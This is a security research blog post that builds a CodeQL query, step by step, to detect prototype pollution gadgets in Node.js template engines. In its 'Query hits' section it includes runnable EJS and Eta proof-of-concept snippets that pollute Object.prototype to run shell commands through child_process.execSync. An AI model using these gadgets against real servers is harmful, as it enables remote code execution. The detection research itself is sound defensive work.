Finding Prototype Pollution gadgets with CodeQL
TL;DR
Following the latest CodeQL introduction post, and inspired by a challenge from SonarSource’s #codeadvent2021 and SecurityMB’s October 2021 challenge, I thought it would be fun to write a CodeQL query to find prototype pollution gadgets.
I started with a quick and dirty approach (to be fair, it was my first time using CodeQL for JavaScript) that already found interesting results and that I then improved step by step, so keep reading if you want to see the entire process along with some interesting results!
Prototype Pollution
The objective of this post is not to explain what a prototype pollution vulnerability is. In short, being able to edit an object’s prototype or Object’s prototype (through their properties) lets an attacker pollute it and, quite likely, maliciously change what the affected code does.
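As a quick refresher, here is a minimal sketch of the effect described above. The helper names (pollute, cleanup) and the isAdmin property are made up for illustration; a real bug would reach Object.prototype through something like an unsafe recursive merge rather than a direct write.

```javascript
// Simulate the outcome of a prototype pollution bug: an attacker-controlled
// write lands on Object.prototype instead of on a single object.
// `pollute`, `cleanup` and `isAdmin` are hypothetical names.
function pollute(key, value) {
  Object.prototype[key] = value;
}

function cleanup(key) {
  delete Object.prototype[key];
}

const config = {};              // never defines "isAdmin"
const before = config.isAdmin;  // read before the pollution

pollute("isAdmin", true);
const after = config.isAdmin;   // same read, now resolved through the prototype
const own = Object.prototype.hasOwnProperty.call(config, "isAdmin");

cleanup("isAdmin");             // leave the global prototype as we found it
console.log(before, after, own);
```

The object itself never changes (own stays false); only the lookup result does, which is why the affected code rarely notices anything.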
Gadgets
We may understand [insert vulnerability here] gadgets as code snippets or behaviours that help a vulnerability to happen. In this case, a prototype pollution gadget is a read of an object property that is not defined, whose value flows to a JS-executing function (such as eval or Function).
- The property must not be defined on the object itself, because a property read falls back to the object’s prototype only when the object has no own property with that name.
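To make the definition concrete, this is a rough sketch of what such a gadget can look like. The compile function and its prefix option are hypothetical and not taken from any real template engine, and the payload is a harmless stand-in that only sets a flag.

```javascript
// Hypothetical mini "template compiler": opts.prefix is read but never
// defined by the caller, and its value ends up in code passed to Function.
function compile(body, opts) {
  opts = opts || {};
  const prefix = opts.prefix || "";   // undefined property read: the gadget
  return new Function("data", prefix + "return " + body + ";");
}

// Without pollution the generated function only evaluates the template body.
const clean = compile("data.x + 1")({ x: 1 });

// Harmless stand-in for an attacker payload living on Object.prototype.
Object.prototype.prefix = "globalThis.gadgetFired = true;";
const polluted = compile("data.x + 1")({ x: 1 });
delete Object.prototype.prefix;

console.log(clean, polluted, globalThis.gadgetFired);
```

The template result is the same in both runs, but in the second one the injected statement ran first. That source ({}) to sink (Function) flow is what the query below tries to find.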
CodeQL query development
You may find the final query at #final-query.
The first approach looked like the following snippet:
/**
 * @kind path-problem
 */
import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph
class BadIfPollutedConfig extends TaintTracking::Configuration {
  BadIfPollutedConfig() { this = "BadIfPollutedConfig" }
  // Any {} that does not set a custom __proto__
  override predicate isSource(DataFlow::Node source) {
    exists(DataFlow::ObjectLiteralNode object |
      not object.toString().matches("%\\_\\_proto\\_\\_%") and
      source = object
    )
  }
  // An expression which may be evaluated as JavaScript
  override predicate isSink(DataFlow::Node sink) { sink instanceof EvalJavaScriptSink }
  // Make a valid step: variable = {} -> Object.create(variable)
  override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::SourceNode c, DataFlow::CallNode call |
      c.toString() = "Object.create" and
      call = c.getACall() and
      nodeFrom = call.getArgument(0) and
      nodeTo = call
    )
  }
}
from BadIfPollutedConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@", source.getNode(), "Empty dict",
  sink.getNode(), "this eval-alike call."
However, almost every part of it can be improved.
Source
override predicate isSource(DataFlow::Node source) {
  exists(DataFlow::ObjectLiteralNode object |
    not object.toString().matches("%\\_\\_proto\\_\\_%") and
    source = object
  )
}
Some of you may have wanted to erase me from the universe for using toString() to check a property access, but that’s the only thing I could think of before digging into the juice of CodeQL for JavaScript.
Playing with objects' properties:
- a = {}: ObjectLiteralNode declaration.
- a.foo = "bar": PropWrite
  - getBase() is a use of the first point (then getBase().getALocalSource() is what we will be using to correlate both nodes).
  - getPropertyName() returns foo.
  - getRhs() returns "bar".
- eval(a.foo): eval’s first argument is a PropRead with the same getBase() and getPropertyName() predicates.
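For reference, the three statements above fit in a tiny test file like the sketch below, with the corresponding CodeQL classes noted in comments. One deliberate change: I assign "1 + 1" instead of "bar" so the eval call actually evaluates something when the file is run.

```javascript
// Each statement is annotated with the data flow node class discussed above.
const a = {};                // ObjectLiteralNode
a.foo = "1 + 1";             // PropWrite: base `a`, property name "foo", rhs "1 + 1"
const result = eval(a.foo);  // eval's argument is a PropRead: base `a`, property name "foo"

console.log(result);
```

Here foo is defined on a, so this file is not a gadget by itself; it only helps to see which nodes the predicates return.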
class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
  BadIfPollutedSource() {
    not exists(DataFlow::PropWrite propWrite |
      // ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
      exists( |
        propWrite.getPropertyName() = ["__proto__", "constructor"] and
        propWrite.getBase().getALocalSource() = this
      )
      or
      // ObjectLiteralNode.constructor.prototype
      exists(DataFlow::PropRead constRead |
        constRead.getPropertyName() = "constructor" and
        constRead.getBase().getALocalSource() = this and
        propWrite.getPropertyName() = "prototype" and
        propWrite.getBase().getALocalSource() = constRead
      ) and
      propWrite.getRhs().asExpr() instanceof NullLiteral
    )
  }
}
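The reason for excluding these objects can be seen at runtime. The sketch below is only an illustration (the polluted property name is made up): once an object's __proto__ is overwritten with null, its property reads no longer fall back to Object.prototype, so it stops being an interesting source.

```javascript
// Stand-in for an already polluted prototype; `polluted` is a made-up name.
Object.prototype.polluted = "payload";

const plain = {};            // keeps Object.prototype: still a candidate source
const detached = {};
detached.__proto__ = null;   // PropWrite to __proto__: prototype chain is cut

const plainRead = plain.polluted;        // resolved through Object.prototype
const detachedRead = detached.polluted;  // nothing to fall back to

delete Object.prototype.polluted;
console.log(plainRead, detachedRead);
```

Only plain would be worth tracking here; detached is the kind of object the class above filters out.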
Sink
override predicate isSink(DataFlow::Node sink) {
  sink instanceof EvalJavaScriptSink
}
The sink’s evolution just focuses on getting more precise results, such as tainted in tainted + foo, when that is the last step of a flow.
class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
  DataFlow::ValueNode t;
  DataFlow::InvokeNode c;
  CustomEvalJavaScriptSink() {
    t instanceof EvalJavaScriptSink and
    c.getAnArgument() = t and
    (
      if exists(t.asExpr().(AddExpr))
      then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
      else this = t
    )
  }
  DataFlow::InvokeNode getCall() { result = c }
}
Furthermore, wrapping EvalJavaScriptSink in a field lets us get the call whose argument is that sink, in order to provide a getCall() predicate that is used in the select clause of the query.
Additional taint step
override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
  exists(DataFlow::SourceNode c, DataFlow::CallNode call |
    c.toString() = "Object.create" and
    call = c.getACall() and
    nodeFrom = call.getArgument(0) and
    nodeTo = call
  )
}
This taint step lets CodeQL know that there may be flow such as an ObjectLiteralNode flowing to the first argument of Object.create, whose result is also a valid gadget.
We will be using globalVarRef and its getAMemberCall predicate to properly get the Object.create call (instead of using SourceNode’s toString).
override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
  exists(DataFlow::InvokeNode objectCreate |
    objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
    nodeFrom = objectCreate.getArgument(0) and
    nodeTo = objectCreate
  )
}
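Why the result of Object.create deserves this extra step is easy to check at runtime. This is a small sketch with made-up names: an object created from a plain {} still reaches Object.prototype through it, while Object.create(null) does not.

```javascript
// Stand-in for an already polluted prototype; `polluted` is a made-up name.
Object.prototype.polluted = "payload";

const base = {};
const child = Object.create(base);   // chain: child -> base -> Object.prototype
const bare = Object.create(null);    // no prototype at all

const childRead = child.polluted;    // inherited through `base`
const bareRead = bare.polluted;      // nothing to inherit from
const chainOk = Object.getPrototypeOf(child) === base;

delete Object.prototype.polluted;
console.log(childRead, bareRead, chainOk);
```

So a = {} followed by Object.create(a) yields an object that is just as pollutable as a itself, which is the flow the taint step models.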
Sanitizer
override predicate isSanitizer(DataFlow::Node sanitizer) {
  exists(LogOrExpr orExpr, Expr leftSource |
    leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
    not leftSource = orExpr.getLeftOperand() and
    not leftSource instanceof NullLiteral and
    not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
    sanitizer.asExpr() = orExpr.getRightOperand()
  )
}
We want to stop tracking flow when a LogOrExpr (foo || bar) holds an ObjectLiteralNode on the right side of the expression and a valid (defined, non-null, non-false) variable as the left operand, since in that case the left operand is the value that gets assigned.
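The runtime behaviour that this sanitizer approximates looks like the sketch below. The withDefaults helper is hypothetical; it just mirrors the common options || {} pattern and reports whether the fallback literal was actually used.

```javascript
// Hypothetical helper mirroring the `foo || {}` pattern.
function withDefaults(options) {
  const fallback = {};                  // the ObjectLiteralNode on the right side
  const chosen = options || fallback;   // LogOrExpr: right side used only if left is falsy
  return { chosen, usedFallback: chosen === fallback };
}

const given = withDefaults({ varName: "it" });  // left operand wins
const missing = withDefaults(undefined);        // fallback literal wins

console.log(given.usedFallback, missing.usedFallback);
```

Statically, the query cannot always tell which case applies, which is why the sanitizer only kicks in when the left operand has a known local source that is neither null nor possibly false.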
Debugging
Let’s make query development easier and more fun by:
- Using Backward DataFlow: Set isSource() as any(), so we will be getting every single node flowing to our specific sink.
- Using Forward DataFlow: Set isSink() as any(), so we will be getting flow from our specific source to any node.
- Setting custom node files in order to restrict result locations.
- Using a custom PathNode implementation to get the QL class used in each step of the flow path.
See #debugging-query.
Query hits
In order to test the query, I ran it against all sources listed in Template engines for NodeJS.
Some snippets to test locally:
- Outdated EJS (version provided by NPM though)
// edited from https://twitter.com/sonarsource/status/1471148042577350659
const express = require('express');
const app = express();
app.set('view engine', 'ejs');
app.set('views', __dirname + '/views');
cmd = "sleep 10";
Object.prototype.outputFunctionName = `a;process.mainModule.require('child_process').execSync('${cmd}');//`;
Object.prototype.client = "notEmpty"; Object.prototype.escapeFunction = '`${process.mainModule.require(\'child_process\').execSync(\'' + cmd + '\')}`';
Object.prototype.client = "notEmpty"; Object.prototype.escape = '`${process.mainModule.require(\'child_process\').execSync(\'' + cmd + '\')}`';
Object.prototype.localsName = `a=process.mainModule.require('child_process').execSync('${cmd}')`;
Object.prototype.destructuredLocals = ["/*", `*/a=process.mainModule.require('child_process').execSync('${cmd}');//`];
app.get('/ejs', (req, res) => {
res.render('template', {foo: "bar"})
})
app.listen(1337);
- Eta
// edited from https://eta.js.org/docs/examples/express
var express = require("express")
var app = express()
var eta = require("eta")
app.engine("eta", eta.renderFile)
app.set("view engine", "eta")
app.set('views', __dirname + '/views');
cmd = "sleep 10";
Object.prototype.useWith = "notEmpty"; Object.prototype.varName = `a=process.mainModule.require('child_process').execSync('${cmd}')`;
app.get("/eta", function (req, res) {
res.render("template", {foo: "bar"})
})
app.listen(1337)
Final query
/**
 * @kind path-problem
 */
import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph
/**
 * A custom `EvalJavaScriptSink` wrapper.
 *
 * * `t` holds `EvalJavaScriptSink`.
 * * `c` holds the call holding `t`.
 *
 * There's an additional taint step specified in order to catch
 * `tainted` in sinks like `tainted + foo`; since the sink is
 * the entire argument, this way the results are more accurate.
 */
class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
  DataFlow::ValueNode t;
  DataFlow::InvokeNode c;
  CustomEvalJavaScriptSink() {
    t instanceof EvalJavaScriptSink and
    c.getAnArgument() = t and
    (
      if exists(t.asExpr().(AddExpr))
      then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
      else this = t
    )
  }
  DataFlow::InvokeNode getCall() { result = c }
}
/**
 * An `ObjectLiteralNode` not overriding its `__proto__`, `constructor` and
 * `constructor.prototype` properties.
 *
 * It is not set as sanitizer since flow between two same source-sink AST nodes
 * may differ (i.e., one path in source-sink flow may not pass through this
 * property writes)
 */
class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
  BadIfPollutedSource() {
    not exists(DataFlow::PropWrite propWrite |
      // ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
      exists( |
        propWrite.getPropertyName() = ["__proto__", "constructor"] and
        propWrite.getBase().getALocalSource() = this
      )
      or
      // ObjectLiteralNode.constructor.prototype
      exists(DataFlow::PropRead constRead |
        constRead.getPropertyName() = "constructor" and
        constRead.getBase().getALocalSource() = this and
        propWrite.getPropertyName() = "prototype" and
        propWrite.getBase().getALocalSource() = constRead
      ) and
      propWrite.getRhs().asExpr() instanceof NullLiteral
    )
  }
}
class BadIfPollutedConfig extends TaintTracking::Configuration {
  BadIfPollutedConfig() { this = "BadIfPollutedConfig" }
  /**
   * An `ObjectLiteralNode` that does not set a custom prototype
   * on its declaration or flow.
   *
   * See `BadIfPollutedSource`.
   */
  override predicate isSource(DataFlow::Node source) { source instanceof BadIfPollutedSource }
  /**
   * An expression which may be evaluated as JavaScript.
   *
   * See `CustomEvalJavaScriptSink`.
   */
  override predicate isSink(DataFlow::Node sink) { sink instanceof CustomEvalJavaScriptSink }
  /**
   * Make a valid taint step: `a = {} -> Object.create(a)`.
   */
  override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::InvokeNode objectCreate |
      objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
      nodeFrom = objectCreate.getArgument(0) and
      nodeTo = objectCreate
    )
  }
  /**
   * `foo || BadIfPollutedSource` -> `foo` holds a non (not defined|null|false) value
   * and so it will be assigned instead of `BadIfPollutedSource`.
   *
   * FP issue: `foo` may be declared out of taint tracking's scope.
   *
   * `leftSource = orExpr.getLeftOperand()`: when a node's local source is itself
   * means the node might not be defined in the scope.
   */
  override predicate isSanitizer(DataFlow::Node sanitizer) {
    exists(LogOrExpr orExpr, Expr leftSource |
      leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
      not leftSource = orExpr.getLeftOperand() and
      not leftSource instanceof NullLiteral and
      not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
      sanitizer.asExpr() = orExpr.getRightOperand()
    )
  }
}
from BadIfPollutedConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@ as $@", source.getNode(), "This object",
  sink.getNode().(CustomEvalJavaScriptSink).getCall(), "this eval-alike call", sink.getNode(),
  sink.toString()
Debugging query
semmle.javascript.custom.Debug:
private import javascript
module Debug {
  /**
   * If `true`, show the QL class for each flow step.
   */
  boolean getDebug() { result = false }
  /**
   * If `true`, apply Backward Dataflow.
   */
  boolean getBackward() { result = false }
  /**
   * If `true`, apply Forward Dataflow.
   */
  boolean getForward() { result = false }
  /**
   * Returns a `File` with a specific basename.
   */
  File getFile() {
    result.getBaseName().matches("%%") and not result.getBaseName().matches("test.js")
  }
}
class CustomPathNode extends DataFlow::PathNode {
  CustomPathNode() { this = this }
  override string toString() {
    if Debug::getDebug() = true
    then result = this.getNode().toString() + ", " + this.getNode().getAQlClass()
    else result = this.getNode().toString()
  }
}
Main query:
/**
 * @kind path-problem
 */
import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph
import semmle.javascript.custom.Debug
/**
 * A custom `EvalJavaScriptSink` wrapper.
 *
 * * `t` holds `EvalJavaScriptSink`.
 * * `c` holds the call holding `t`.
 *
 * There's an additional taint step specified in order to catch
 * `tainted` in sinks like `tainted + foo`; since the sink is
 * the entire argument, this way the results are more accurate.
 */
class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
  DataFlow::ValueNode t;
  DataFlow::InvokeNode c;
  CustomEvalJavaScriptSink() {
    t instanceof EvalJavaScriptSink and
    c.getAnArgument() = t and
    (
      if exists(t.asExpr().(AddExpr))
      then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
      else this = t
    )
  }
  DataFlow::InvokeNode getCall() { result = c }
}
/**
 * An `ObjectLiteralNode` not overriding its `__proto__`, `constructor` and
 * `constructor.prototype` properties.
 *
 * It is not set as sanitizer since flow between two same source-sink AST nodes
 * may differ (i.e., one path in source-sink flow may not pass through this
 * property writes)
 */
class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
  BadIfPollutedSource() {
    not exists(DataFlow::PropWrite propWrite |
      // ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
      exists( |
        propWrite.getPropertyName() = ["__proto__", "constructor"] and
        propWrite.getBase().getALocalSource() = this
      )
      or
      // ObjectLiteralNode.constructor.prototype
      exists(DataFlow::PropRead constRead |
        constRead.getPropertyName() = "constructor" and
        constRead.getBase().getALocalSource() = this and
        propWrite.getPropertyName() = "prototype" and
        propWrite.getBase().getALocalSource() = constRead
      ) and
      propWrite.getRhs().asExpr() instanceof NullLiteral
    )
  }
}
class BadIfPollutedConfig extends TaintTracking::Configuration {
  BadIfPollutedConfig() { this = "BadIfPollutedConfig" }
  /**
   * An `ObjectLiteralNode` that does not set a custom prototype
   * on its declaration or flow.
   *
   * See `BadIfPollutedSource`.
   */
  override predicate isSource(DataFlow::Node source) {
    (if Debug::getBackward() = true then any() else source instanceof BadIfPollutedSource) and
    source.getFile() = Debug::getFile()
  }
  /**
   * An expression which may be evaluated as JavaScript.
   *
   * See `CustomEvalJavaScriptSink`.
   */
  override predicate isSink(DataFlow::Node sink) {
    (if Debug::getForward() = true then any() else sink instanceof CustomEvalJavaScriptSink) and
    sink.getFile() = Debug::getFile()
  }
  /**
   * Make a valid taint step: `a = {} -> Object.create(a)`.
   */
  override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::InvokeNode objectCreate |
      objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
      nodeFrom = objectCreate.getArgument(0) and
      nodeTo = objectCreate
    )
  }
  /**
   * `foo || BadIfPollutedSource` -> `foo` holds a non (not defined|null|false) value
   * and so it will be assigned instead of `BadIfPollutedSource`.
   *
   * FP issue: `foo` may be declared out of taint tracking's scope.
   *
   * `leftSource = orExpr.getLeftOperand()`: when a node's local source is itself
   * means the node might not be defined in the scope.
   */
  override predicate isSanitizer(DataFlow::Node sanitizer) {
    exists(LogOrExpr orExpr, Expr leftSource |
      leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
      not leftSource = orExpr.getLeftOperand() and
      not leftSource instanceof NullLiteral and
      not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
      sanitizer.asExpr() = orExpr.getRightOperand()
    )
  }
}
from BadIfPollutedConfig cfg, CustomPathNode source, CustomPathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@ as $@", source.getNode(), "This object",
  sink.getNode().(CustomEvalJavaScriptSink).getCall(), "this eval-alike call", sink.getNode(),
  sink.toString()
The end
I hope you found it interesting and had fun reading it!